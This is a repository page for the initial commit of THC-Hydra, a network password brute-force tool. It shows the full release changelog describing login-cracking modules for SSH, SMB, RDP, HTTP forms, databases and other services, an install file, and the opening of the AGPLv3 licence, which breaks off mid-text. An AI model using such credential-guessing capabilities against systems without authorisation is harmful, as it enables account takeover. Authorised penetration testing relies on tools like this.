github/thc-hydra
1
0
Fork 0
mirror of https://github.com/vanhauser-thc/thc-hydra.git synced 2025-07-05 04:26:10 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

initial commit

Browse source
This commit is contained in:
U-marc-win4\marc 2014-04-24 16:49:18 +02:00
commit 6a94f708e8
122 changed files with 60195 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

700
CHANGES Normal file
View file

@ -0,0 +1,700 @@
Changelog for hydra
-------------------
Release 7.7
* Added module for redis (submitted by Alejandro Ramos, thanks!)
* Added patch which adds Unicode support for the SMB module (thanks to Max Kosmach")
* Added initial interactive password authentication test for ssh (thanks to Joshua Houghton for submitting)
* Bugfixes for -x option:
- password tries were lost when connection errors happened (thanks to Vineet Kumar for reporting)
- fixed crash when used together with -e option
* Fixed a bug that hydra would not compile without libssh (introduced in v7.6)
* Cygwin's Postgresql is working again, hence configure detection re-enabled
* Added gcc compilation security options (if detected to be supported by configure script)
* Enhancements to the secure compilation options
* Checked code with cppcheck and fixed some minor issues. surprised it were so few and unlikely stuff :-)
Release 7.6
* Added a wizard script for hydra based on a script by Shivang Desai <shivang.ice.2010@gmail.com>
* Added module for Siemens S7-300 (submitted by Alexander Timorin and Sergey Gordeychik, thanks!)
* HTTP HEAD/GET: MD5 digest auth was not working, fixed (thanks to Paul Kenyon)
* SMTP Enum: HELO is now always sent, better 500 error detection
* hydra main:
- fixed a bug in the IPv6 address parsing when a port was supplied
- added info message for pop3, imap and smtp protocol usage
* hydra GTK: missed some services, added
* dpl4hydra.sh:
- added Siemens S7-300 common passwords to default password list
- more broad searching in the list
* Performed code indention on all C files :-)
* Makefile patch to ensure .../etc directory is there (thanks to vonnyfly)
Release 7.5
* Moved the license from GPLv3 to AGPLv3 (see LICENSE file)
* Added module for Asterisk Call Manager
* Added support for Android where some functions are not available
* hydra main:
- reduced the screen output if run without -h, full screen with -h
- fix for IPv6 and port parsing with service://[ipv6address]:port/OPTIONS
- fixed -o output (thanks to www417)
- warning if HYDRA_PROXY is defined but the module does not use it
- fixed an issue with large input files and long entries
* hydra library:
- SSL connections are now fixed to SSLv3 as some SSL servers fail otherwise, report if this gives you problems
- removed support for old OPENSSL libraries
* HTTP Form module:
- login and password values are now encoded if special characters are present
- ^USER^ and ^PASS^ are now also supported in H= header values
- if you the colon as a value in your option string, you can now escape it with \: - but do not encode a \ with \\
* Mysql module: protocol 10 is now supported
* SMTP, POP3, IMAP modules: Disabled the TLS in default. TLS must now be
defined as an option "TLS" if required. This increases performance.
* Cisco module: fixed a small bug (thanks to Vitaly McLain)
* Postgres module: libraries on Cygwin are buggy at the moment, module is therefore
disabled on Cygwin
Release 7.4.3 FIX RELEASES for bugs introduced in 7.4
* Quickfix for people who do not have libssh installed (won't compile otherwise)
* Quickfix for http-get/http-head and irc module which would not run due a new feature.
* Fix for the ssh module that breaks an endless loop if a service becomes unavailable (thanks to shark0der(at)gmail(dot)com for reporting)
Release 7.4
* New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!)
* Added support for win8 and win2012 server to the RDP module
* Better target distribution if -M is used
* Added colored output (needs libcurses)
* Better library detection for current Cygwin and OS X
* Fixed the -W option
* Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested
* Fixed HTTP Form module false positive when no answer was received from the server
* Fixed SMB module return code for invalid hours logon and LM auth disabled
* Fixed http-{get|post-form} from xhydra
* Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz)
* Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-)
* Added debug mode option to usage (thanks to Anold Black)
Release 7.3
* Hydra main:
- Added -F switch to quit all targets if one pair was found (for -M)
- Fixed a bug where hydra would terminate after reporting a successful
login when an account would accept any password
- Fixed a bug with very large wordlists (thanks to sheepdestroyer for reporting!)
- Enhanced the module help
* configure script:
- Added fix Oracle library inclusion, thanks to Brandon Archer!
- Added --nostrip option to prevent binary stripping (requested by Fedora
maintainer)
* Added a Makefile patch by the Debian maintainers to support their
SecurityHardeningBuildFlags for the wheezy build as requested
* dpl4hydra: added install directory support
* All code: message cleanups
* SNMP module
- originally already supported write and v2 although this was not in the
module help output. Added :-)
- added SNMPv3 MD5/SHA1 authentication support, though beta still
* HTTP module:
- fixed HTTP NTLM auth session
- implemented errata fix for HTTP digest md5-sess algorithm
- set default path to /
* HTTP Form module:
- set default path to /
- support HTTP/1.0 redirects
- fix failed condition check when pcre is not used
* IMAP module: fixed auth detection
* POP3 module: Updated auth and capability detection
* Oracle module: fixed bad handling
* Oracle listener module: fixed hash size handling
* Telnet/Cisco/Cisco-enable modules: support "press ENTER" prompts
* FTP module:
- Fixed a bug where 530 messages were incorrectly handled
- Clarification for the usage of ftps
* Mysql module: added patch from Redhat/Fedora that fixes compile problems
* Added IDN and PCRE support for Cygwin
Release 7.2
* Speed-up http modules auth mechanism detection
* Fixed -C colonfile mode when empty login/passwords were used (thanks to
will(at)configitnow(dot)com for reporting)
* The -f switch was not working for postgres, afp, socks5, firebird and ncp,
thanks to Richard Whitcroft for reporting!
* Fixed NTLM auth in http-proxy/http-proxy-url module
* Fixed URL when being redirected in http-form module, thanks to gash(at)chaostreff(dot)at
* Fix MSSQL success login condition, thanks to whistle_master(at)live(dot)com
* Fix http form module: optional headers and 3xx status redirect, thx to Gash
* Fix in configure script for --prefix option, thanks to dazzlepod
* Update of the dpl4hydra script by Roland Kessler, thanks!
* Small fix for hydra man page, thanks to brad(at)comstyle(dot)com
Release 7.1
* Added HTTP Proxy URL enumeration module
* Added SOCKS4/SOCKS5 proxy support with authentication
* Added IPv6 support for SOCKS5 module
* Added -e r option to try the reversed login as password
* Rewrote -x functionality as the code caused too much trouble (thanks to
murder.net7(at)gmail.com for reporting one of the issues)
* Fixed a bug with multiple hosts (-M) and http modules against targets that
are virtual servers. Well spotted by Tyler Krpata!
* Fixed SVN IPv6 support and updated deprecated calls
* Fixed RDP failed child connection returned value and false positive issues
reported by Wangchaohui, thanks!
* Fixed restore file functionality, was not working together with -o option
* Fix in http-form module for bug introduced in 7.0
* Fixed xhydra specific parameter value for http-proxy module
* minor enhancements
Release 7.0
* New main engine for hydra: better performance, flexibility and stability
* New option -u - loop around users, not passwords
* Option -e now also works with -x and -C
* Added RDP module, domain can be passed as argument
* Added other_domain option to smb module to test trusted domains
* Small enhancement for http and http-proxy module for standard ignoring servers
* Lots of bugfixes, especially with many tasks, multiple targets and restore file
* Fixes for a few http-form issues
* Fix smb module NTLM hash use
* Fixed Firebird module deprecated API call
* Fixed for dpl4hydra to work on old sed implementations (OS/X ...)
* Fixed makefile to install dpl4hydra (thx @sitecrea)
* Fixed local buffer overflow in debug output function (required -d to be used)
* Fixed xhydra running warnings and correct quit action event
Release 6.5
* Improved HTTP form module: getting cookie, fail or success condition, follow
multiple redirections, support cookie gathering URL, multiple user defined
headers
* Added interface support for IPv6, needed for connecting to link local fe80::
addresses. Works only on Linux and OS/X. Information for Solaris and *BSD welcome
* Added -W waittime between connects option
* The -x bruteforce mode now allows for generated password amounts > 2 billion
* Fix if -L was used together with -x
* Fixes for http- modules when the http-...://target/options format was used
* Fixed a bug in the restore file write function that could lead to a crash
* Fixed XMPP module jabber init request and challenge response check, thx "F e L o R e T"
* Fix: if a proxy was used, unresolveable targets were disabled. now its fine
* Fix for service://host/ usage if a colon was used after the URI without a
port defined
Release 6.4
* Update SIP module to extract and use external IP addr return from server error to bypass NAT
* Update SIP module to use SASL lib
* Update email modules to check clear mode when TLS mode failed
* Update Oracle Listener module to work with Oracle DB 9.2
* Update LDAP module to support Windows 2008 active directory simple auth
* Fix to the connection adaptation engine which would loose planned attempts
* Fix make script for CentOS, reported by ya0wei
* Print error when a service limits connections and few pairs have to be tested
* Improved Mysql module to only init/close when needed
* Added patch from the FreeBSD maintainers
* Module usage help does not need a target to be specified anymore
* Configure script now honors /etc/ld.so.conf.d/ directory
* Add more SMB dialects
Release 6.3
* Added patch by Petar(dot)Kaley(at)gmail.com which adds nice icons to cygwin hydra files
* Added patch by Gauillaume Rousse which fixes a warning display
* New Oracle module (for databases via OCI, for TNS Listener passwd, for SID enumeration)
* New SMTP user enum module (using VRFY, EXPN or RCPT command)
* Memory leak fix for -x bruteforcing option reported by Alex Lau
* Fix for svn module, for some versions it needs one more lib, thanks to the
Debian team for reporting!
* Fix ssh module, on connection refused a credential could be lost
* Fix http-form module, a redirect was not always followed
* QA on all modules for memory leaks
* Better gtk detection (to not even try xhydra compilation when its useless)
* First blant attempt for configuring to x64 systems (Linux and *BSD)
* Updated network password cracker comparison on the web page (for hydra and new ncrack)
* Indented all source code
Release 6.2
* Added a patch by Jan Dlabal which adds password generation bruteforcing (no more password files :-) )
* Forgot to rename ssh2 to ssh in xhydra, fixed
* Add support for CRAM-MD5 and DIGEST-MD5 auth to ldap module
* Fix SASL PLAIN auth method issue
* Add TLS negotiation support for smtp-auth, pop3, imap, ftp and ldap
* Added man pages from Debian maintainers
* Checked Teamspeak module, works on TS2 protocol
* Add support for SCRAM-SHA1 (RFC 5802), first auth cracker to support it, yeah !
* New module: XMPP with TLS negotiation and LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1 support
* Add SCRAM-SHA1 auth to IMAP module
* Add module usage help (-U)
* Add support for RFC 4013: Internationalized Strings in SASL ("SASLPrep")
* Rename smtpauth module to smtp
* Add SASL + TLS support for NNTP
* Bugfix SASL DIGEST-MD5, response could be wrong sometime, mainly on 64bits systems
* Bugfix rlogin module, some auth failure could not be detected accurately
* Bugfix rsh module, some auth failure could not be detected accurately
* New module: IRC is not dead ! use to find general server password and /oper credential
* Add SSL support for VMware Authentication Daemon module
* Bugfix CVS module, should work now, why does nobody report this ??
* Bugfix Telnet module, when line mode is not available
* Add support for new syntax <service-name>://<target>[:<port-number>][/<parameters>]
* Add TLS support for SIP
* STILL OPEN: Fixed a problem in hydra where a login+pw test was lost when an arm/child was quitting
Release 6.1
* More license updates for the files for the Debian guys
* Fix for the configure script to correctly detect postgresql
* Add checks for libssh v0.4 and support for ssh v1
* Merge all latest crypto code in sasl files
* Fix SVN compilation issue on openSUSE (tested with v11.3)
Release 6.0
* Added GPL exception clause to license to allow linking to OpenSSL - Debian people need this
* IPv6 support finally added. Note: sip and socks5 modules do not support IPv6 yet
* Changes to code and configure script to ensure clean compile on Solaris 11,
OSX, FreeBSD 8.1, Cygwin and Linux
* Bugfix for SIP module, thanks to yori(at)counterhackchallenges(dot)com
* Compile fixes for systems without OpenSSL or old OpenSSL installations
* Eliminated compile time warnings
* xhydra updates to support the new features (david@)
* Added CRAM-MD5, DIGEST-MD5 auth mechanism to the smtp-auth module (david@)
* Added LOGIN, PLAIN, CRAM-(MD5,SHA1,SHA256) and DIGEST-MD5 auth mechanisms to the imap and pop3 modules (david@)
* Added APOP auth to POP3 module (david@)
* Added NTLM and DIGEST-MD5 to http-auth module and DIGEST-MD5 to http-proxy module (david@)
* Fixed VNC module for None and VLC auth (david@)
* Fixes for LDAP module (david@)
* Bugfix Telnet module linemode option negotiation using win7 (david@)
* Bugfix SSH module when max auth connection is reached (david@)
Release 5.9
* Update for the subversion module for newer SVN versions (thanks to David Maciejak @ GMAIL dot com)
* Another patch by David to add the PLAIN auth mechanism to the smtp-auth module
* mysql module now has two implementations and uses a library when found (again
thanks to David Maciejak @ GMAIL dot com - what would hydra be without him)
* camiloculpian @ gmail dot com submitted a logo for hydra - looks cool, thanks!
* better FTP 530 error code detection
* bugfix for the SVN module for non-standard ports (again david@)
Release 5.8
* Added Apple Filing Protocol (thank to "never tired" David Maciejak @ GMAIL dot com)
* Fixed a big bug in the SSL option (-S)
Release 5.7
* Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com)
* Added an old patch to fix a memory from SSL and speed it up too from kan(at)dcit.cz
* Removed unnecessary compiler warnings
* Enhanced the SSH2 module based on an old patch from aris(at)0xbadc0de.be
* Fixed small local defined overflow in the teamspeak module. Does it still work anyway??
Release 5.6 PRIVATE VERSION
###########
* Moved to GPLv3 License (lots of people wanted that)
* Upgraded ssh2 module to libssh-0.4.x (thanks to aris (at) 0xbadc0de.be for
the 0.2 basis)
* Added firebird support (by David Maciejak @ GMAIL dot com)
* Added SIP MD5 auth patch (by Jean-Baptiste Aviat <jba [at] hsc [dot] `french tld`)
* Removed Palm and ARM support
* Fix for cygwin which falsely detected postgres library when there was none.
* Several small bugfixes
Release 5.4
###########
* Fixes to the http modules as some Apache installations are picky
* The MySQL module also works with mysqld-5.0, updated
* Added AS/400 return code checks to pop3 module
* Fixed memory leaks in the http-form module.
* Implemented a proposal by Jean-Baptiste.BEAUFRETON (at) turbomeca.fr to
check for "530 user unknown" message in the ftp module
* Added a performance patch by alejandro.mendiondo (at) baicom.com. This one
needs stability testing!
* Beautification to remove compiler warnings of modern gcc
Release 5.3
###########
* Added NTLM support modules for pop3, imap, smtp-auth and http-proxy.
Work done by ilo (at) reversing.org. THANKS!
* Added a http form module, thanks to phil (at) irmplc.com
* Fixed a bug in the vnc module (thanks to kan (at) dcit.cz)
* Input files may *not* contain null bytes. I might fix that in the future
but currently I have enough other things on my todo sheet.
Thanks to didiln (at) gmail.com for reporting.
Release 5.2
###########
* Again again some fixes for the ssh2 module. This is the last try. If it
finally does not work reliable, I am throwing out that library!
Thanks to bykhe@mymail.ch for the patch
* Added a new module: VMWare-Auth! Thanks to david.maciejak@gmail.com!
Release 5.1
###########
* Again some fixed for the ssh2 module. Sorry. And still it might not work
in all occasions. The libssh is not as mature as we all wish it would be :-(
* HYDRA_PROXY_AUTH was never used ... weird that nobody reported that. fixed.
* Fixed bug in the base64 encoding function
* Added an md5.h include which is needed since openssl 0.9.8
* Added an enhacement to the FTP module, thanks to piotr_sobolewski@o2.pl
* Fixed a bug when not using passwords and just -e n/s
Release 5.0
###########
! THIS IS A THC - TAX - 10TH ANNIVERSARY RELEASE ! HAVE FUN !
* Increadible speed-up for most modules :-)
* Added module for PC-Anywhere, thanks to david.maciejak(at)kyxar.fr!
* Added module for SVN, thanks to david.maciejak(at)kyxar.fr!
* Added --disable-xhydra option to configure, thanks to david.maciejak(at)kyxar.fr!
- he is becoming the top supporter :-)
* Added module for SIP (VoIP), thanks to gh0st(at)staatsfeind.org
* Added support for newer sap r/3 rfcsdk
* Added check to the telnet module to work with Cisco AAA
* Fix for the VNC module, thanks to xmag
* Small enhancement to the mysql plugin by pjohnson(at)bosconet.org
Release 4.7
###########
* Updated ssh2 support to libssh v0.11 - you *must* use this version if
you want to use ssh2! download from http://www.0xbadc0de.be/?part=libssh
This hopefully fixes problems on/against Sun machines.
After fixing, I also received a patch from david maciejak - thanks :-)
* Added an attack module for rlogin and rsh, thanks to
david.maciejak(at)kyxar.fr!
* Added an attack module for the postgres database, thanks to
diaul(at)devilopers.org! (and again: david maciejak sent on in as well)
* JoMo-Kun sent in an update for his smbnt module. cool new features:
win2k native mode, xp anonymous account detection, machine name as password
* Hopefully made VNC 3.7 protocol versions to work. please report.
* Switched http and https service module to http-head, http-get and
https-get, https-head. Some web servers want HEAD, others only GET
* An initial password for cisco-enable is now not required anymore. Some
people had console access without password, so this was necessary.
* Fixed a bug in xhydra which did not allow custom ports > 100
! Soon to come: v5.0 - some cool new features to arrive on your pentest
machine!
Release 4.6
###########
* Snakebyte delivered a module for Teamspeak
* Snakebyte updated the rexec module for the Hydra Palm version
* Snakebyte updated xhydra to support the new Telnet success response option
* Clarified the Licence
* Updated the ldap module to support v3, note that "ldap" is now specified as
"ldap2" or "ldap3". Added wrong version detection.
Release 4.5
###########
* The configure script now detects Cygwin automatically :-)
* The telnet module now handles the OPT special input. Specify the string
which is displayed after successfully a login. Use this if you have false
positives.
* Made smtp-auth module more flexible in EHLO/HELO handling
* Fixed some glitches in the SAP/R3 module (correct sysnr, better port
handling) thanks to ngregoire@exaprobe.com !
* Fixed some glitches in the http/https module
* Fixed a big bug in snakebyte's snmp module
* Warning msg is now displayed if the deprecated icq module is used
* Added warning message to the ssh2 module during compilation as many people
use the newest libssh version which is broken.
Release 4.4
###########
* Fixed another floating point exception *sigh*
* Fixed -C colon mode
* Added EHLO support for the smtp-auth module, required for some smtpd
Release 4.3
###########
* Fixed a divide by zero bug in the status report function
* Added functionality for skipping accounts (cvs is so nice to report this)
* Snakebyte sent in a patch for cvs for skipping nonexisting accounts
* <lerrahn@syss.de> sent in a patch to fix proxy support for the HTTP module
without proxy authentication
Release 4.2
###########
* Snakebyte sent in modules for SNMP and CVS - great work!
* Snakebyte also expanded the gtk gui to support the two new modules
* Justin <connectjunkie@gmail.com> sent in a module for smtp-auth ... thanks!
* master_up@post.cz sent in some few patches to fix small glitches
* Incorporated a check from the openbsd port
Release 4.1
###########
* Snakebyte wrote a very nice GTK GUI for hydra! enjoy!
* due a bug, sometimes hydra would kill process -1 ... baaaad boy!
* found passwords are now also printed to stdout if -o option is used
* <je@sekure.net> reported that hydra wouldn't complain on ssh2 option if
compiled without support, fixed
* <llevier@argosnet.com> made an official port for FreeBSD and sent me a
diff to exchange the MD4 of libdes to openssl
* <vh@helith.net> noticed that hydra will crash on big wordlists as
the result of the mallocs there were not checked, fixed
* Snakebyte expanded his PalmOS Version of hydra to nntp and fixed vnc
* Increased the wait time for children from 5 to 15 seconds, as e.g.
snakebyte reported detection problems
* Fixed some display glitches
Release v4.0
############
#
# This is a summary of changes of the D1 to D5 beta releases and shows
# what makes v4.0 different from 3.1.
# Have fun. Lots of it.
#
# By the way: I need someone to program a nice GTK frontend for hydra,
# would YOU like to do that and receive the fame? Send an email to vh@thc.org !
#
* For the first time there is not only a UNIX/source release but additionally:
! Windows release (cygwin compile with dll's)
! PalmPilot release
! ARM processor release (for all your Zaurus, iPaq etc. running Linux)
* There are new service attack modules:
! ms-sql
! sap r/3 (requires a library)
! ssh v2 (requires a library)
* Enhancements/Fixes to service attack modules:
! vnc module didnt work correctly, fixed
! mysql module supports newer versions now
! http module received a minor fix and has better virtual host support now
! http-proxy supports now an optional URL
! socks5 checks now for false positives and daemons without authentication
* The core code (hydra.c) was rewritten from scratch
! rewrote the internal distribution functions from scratch. code is now
safer, less error prone, easier to read.
! multiple target support rewritten which now includes intelligent load
balancing based on success, error and load rate
! intelligently detect maximum connect numbers for services (per server if
multiple targets are used)
! intelligent restore file writing
! Faster (up to 15%)
! Full Cygwin and Cygwin IPv6 support
* added new tool: pw-inspector - it can be used to just try passwords which
matches the target's password policy
#
# This should be more than enough! :-)
#
... the rest below is history ...
###########################################################################
#
# New Hydra v4.0 code branch
#
Release D5
* added patches by kan@dcit.cz which enhance the proxy module and provide
a small fix for the http module
* small beautifcations to make the compiler happy
! This is the final beta version before public release
- please test everything!
Release D4
* Tick made an update to his configure-arm
* snakebyte@gmx.de added imap, vnc and cisco module support to PalmPilot
* fixed VNC module
* enhanced mysql module to work also with 4.0.x (and all future protocol 10
mysql protocol types)
* enhanced socks5 module to identify daemons which do not require
authentication, and false positive check (otherwise dante would report all
tries as successful)
* fixed a bug in configure for D3 which resulted in compile problems on
several platforms requiring libcrypto
Release D3
* added sapr3 attack module (requires libsdk.a and saprfc.h)
* added ssh2 attack module (requires libssh)
* snakebyte@gmx.de added telnet module support for PalmPilot
* fixed the mssql module, should work now
* fixed -e option bug
* fixed -C option bug (didnt work at all!!)
* fixed double detection (with -e option) plus added simple dictionary
double detection
* target port is now displayed on start
Release D2
* added better virtual host support to the www/http/https/ssl module
(based on a patch from alla@scanit.be)
* added ARM support (does not work for libdes yet, ssl works), done by
Tick <tick@thc.org>
* added Palm support (well, in reality it is more a rewrite which can use
the hydra-modules), done by snakebyte <snakebyte@gmx.de>
* added ms-sql attack module (code based on perl script form HD Moore
<hdm@digitaloffense.net>, thanks for contributing)
Release D1 (3 March 2003)
* rewrote the internal distribution functions from scratch. code is now
safer, less error prone, easier to read.
* multiple target support rewritten which now includes intelligent load
balancing based on success, error and load rate
* intelligently detect maximum connect numbers for services (per server if
multiple targets are used)
* intelligent restore file writing
* Faster (up to 15%)
* Full Cygwin and Cygwin IPv6 support
* added new tool: pw-inspector - it can be used to just try passwords which
matches the target's password policy
###########################################################################
v3.0 (FEBRUARY 2004) PUBLIC RELEASE
* added a restore function to enable you to continue aborted/crashed
sessions. Just type "hydra -R" to continue a session.
NOTE: this does not work with the -M option! This feature is then disabled!
* added a module for http proxy authentication cracking ("http-proxy") :-)
* added HTTP and SSL/CONNECT proxy support. SSL/CONNECT proxy support works
for *all* TCP protocols, you just need to find a proxy which allows you to
CONNECT on port 23 ...
The environment variable HYDRA_PROXY_HTTP defines the web proxy. The
following syntax is valid: HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
Same for HYDRA_PROXY_CONNECT.
If you require authentication for the proxy, use the HYDRA_PROXY_AUTH
environment variable:
HYDRA_PROXY_AUTH="login:password"
* fixed parallel host scanning engine (thanks to m0j0.j0j0 for reporting)
* A status, speed and time to completion report is now printed every minute.
* finally updated the README
v2.9 (FEBRUARY 2004) PRIVATE RELEASE
...
v2.8 (JANUARY 2004) PRIVATE RELEASE
...
v2.7 (JANUARY 2004) PUBLIC RELEASE
* small fix for the parallel host code (thanks to m0j0@foofus.net)
v2.6 (DECEMBER 2003) PUBLIC RELEASE
* fixed a compiling problem for picky compilers.
v2.5 (NOVEMBER 2003) PUBLIC RELEASE
* added a big patch from m0j0@foofus.net which adds:
- AAA authentication to the cisco-enable module
- Running the attacks on hosts in parallel
- new smbnt module, which uses lanman hashes for authentication, needs libdes
! great work and thanks !
* changed code to compile easily on FreeBSD
* changed configure to compile easily on MacOS X - Panther (cool OS btw ...)
v2.4 (AUGUST 2003) PUBLIC RELEASE
* public release
=== 2.3 stuff===
* added mysql module (thanks to mcbethh@u-n-f.com)
* small fix in vnc (thanks to the Nessus team)
* added credits for vnc-module (FX/Phenolite)
* new ./configure script for better Solaris and *BSD support (copied from amap)
* updated to new email/www addresses => www.thc.org
v2.2 (OCTOBER 2002) PUBLIC RELEASE
* fixed a bug in the -P passwordfile handling ... uhhh ... thanks to all
the many people who reported that bug!
* added check if a password in -P passwordfile was already done via the
-e n|s switch
v2.1 (APRIL 2002) PUBLIC RELEASE
* added ldap cracking mode (thanks to myself, eh ;-)
* added -e option to try null passwords ("-e n") and passwords equal to the
login ("-e s"). When specifying -e, -p/-P is optional (and vice versa)
* when a login is found, hydra will now go on with the next login
v2.0 (APRIL 2002) PRIVATE RELEASE
! with v1.1.14 of Nessus, Hydra is a Nessus plugin!
* incorporated code to make hydra a nessus plugin (thanks to deraison@cvs.nessus.org !)
* added smb/samba/CIFS cracking mode (thanks to deraison@cvs.nessus.org !)
* added cisco-enable cracking mode (thanks to J.Marx@secunet.de !)
* minor enhancements and fixes
v1.7 (MARCH 2002) PRIVATE RELEASE
* configure change to better detect OpenSSL
* ported to Solaris
v1.6 (FEBRUARY 2002) PUBLIC RELEASE
* added socks5 support (thanks to bigbud@weed.tc !)
v1.5 (DECEMBER 2001) PRIVATE RELEASE
* added -S option for SSL support (for all TCP based protocols)
* added -f option to stop attacking once a valid login/pw has been discovered
* made modules more hydra-mod compliant
* configure stuff thrown out - was not really used and too complicated,
wrote my own, lets hope it works everywhere ;-)
v1.4 (DECEMBER 2001) PUBLIC RELEASE
* added REXEC cracking module
* added NNTP cracking module
* added VNC cracking module (plus the 3DES library, which is needed) - some
of the code ripped from FX/Phenolite :-) thanks a lot
* added PCNFS cracking module
* added ICQ cracking module (thanks to ocsic <pisco@private.as>!!)
* for the pcnfs cracking module, I had to add the hydra_connect_udp function
* added several compactibility stuff to work with all the M$ crap
v1.3 (September 2001) PUBLIC RELEASE
* uh W2K telnetd sends null bytes in negotiation mode. workaround implemented.
* Rewrote the finish functions which would sometimes hang. Shutdowns are faster
now as well.
* Fixed the line count (it was always one to much)
* Put more information in the outpufile (-o)
* Removed some configure crap.
v1.2 (August 2001) PRIVATE RELEASE
* Fixed a BIG bug which resulted in accounts being checked serveral times. ugh
* Fixed the bug which showed the wrong password for a telnet hack. Works for
me. please test.
* Added http basic authentication cracking. Works for me. please test.
* Fixed the ftp cracker module for occasions where a long welcome message was
displayed for ftp.
* Removed some compiler warnings.
v1.1 (May 2001) PUBLIC RELEASE
* Added wait+reconnect functionality to hydra-mod
* Additional wait+reconnect for cisco module
* Added small waittimes to all attack modules to prevent too fast reconnects
* Added cisco Username/Password support to the telnet module
* Fixed a deadlock in the modules, plus an additional one in the telnet module
v1.0 (April 2001) PUBLIC RELEASE
* Verified that all service modules really work, no fix necessary ;-)
... so let's make it public
* Changed the LICENCE
v0.6 (April 2001) PRIVATE RELEASE
* Added hydra-cisco.c for the cisco 3 times "Password:" type
* Added hydra-imap.c for the imap service
* Fixed a bug in hydra-mod.c: empty logins resulted in an empty
hydra_get_next_password() :-(, additionally the blocking/recv works better
now. (no, not better - perfect ;-)
* Fixed a bug in hydra-telnet.c: too many false alarms for success due some
mis-thinking on my side and I also implemented a more flexible checking
* Fixed hydra-ftp.c to allow more weird reactions
* Fixed all ;-) memory leaks
v0.5 (December 2000) PUBLIC RELEASE
* NOTE WE HAVE GOT A NEW WWW ADDRESS -> www.thehackerschoice.com
* added telnet protocol
* exchanged snprintf with sprintf(%.250s) to let it compile on more platforms
but still have buffer overflow protection.
* fixed a bug in Makefile.in (introduced by Plasmo ,-)
v0.4 (August 2000) PUBLIC RELEASE
* Plasmoid added a ./configure script. thanks!
v0.3 (August 2000)
* first release

11
INSTALL Executable file
View file

@ -0,0 +1,11 @@
type "./configure", then "make" and finally "sudo make install"
For special modules you need to install software packages before
you run "./configure":
Ubuntu/Debian: apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev
Redhat/Fedora: yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
OpenSuSE: zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel
For the Oracle login module, install the basic and SDK packages:
http://www.oracle.com/technetwork/database/features/instant-client/index.html

683
LICENSE Executable file
View file

@ -0,0 +1,683 @@
[see the end of the file for the special exception for linking with OpenSSL
- debian people need this]
GNU AFFERO GENERAL PUBLIC LICENSE
Version 3, 19 November 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU Affero General Public License is a free, copyleft license for
software and other kinds of works, specifically designed to ensure
cooperation with the community in the case of network server software.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
our General Public Licenses are intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
Developers that use our General Public Licenses protect your rights
with two steps: (1) assert copyright on the software, and (2) offer
you this License which gives you legal permission to copy, distribute
and/or modify the software.
A secondary benefit of defending all users' freedom is that
improvements made in alternate versions of the program, if they
receive widespread use, become available for other developers to
incorporate. Many developers of free software are heartened and
encouraged by the resulting cooperation. However, in the case of
software used on network servers, this result may fail to come about.
The GNU General Public License permits making a modified version and
letting the public access it on a server without ever releasing its
source code to the public.
The GNU Affero General Public License is designed specifically to
ensure that, in such cases, the modified source code becomes available
to the community. It requires the operator of a network server to
provide the source code of the modified version running there to the
users of that server. Therefore, public use of a modified version, on
a publicly accessible server, gives the public access to the source
code of the modified version.
An older license, called the Affero General Public License and
published by Affero, was designed to accomplish similar goals. This is
a different license, not a version of the Affero GPL, but Affero has
released a new version of the Affero GPL which permits relicensing under
this license.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU Affero General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
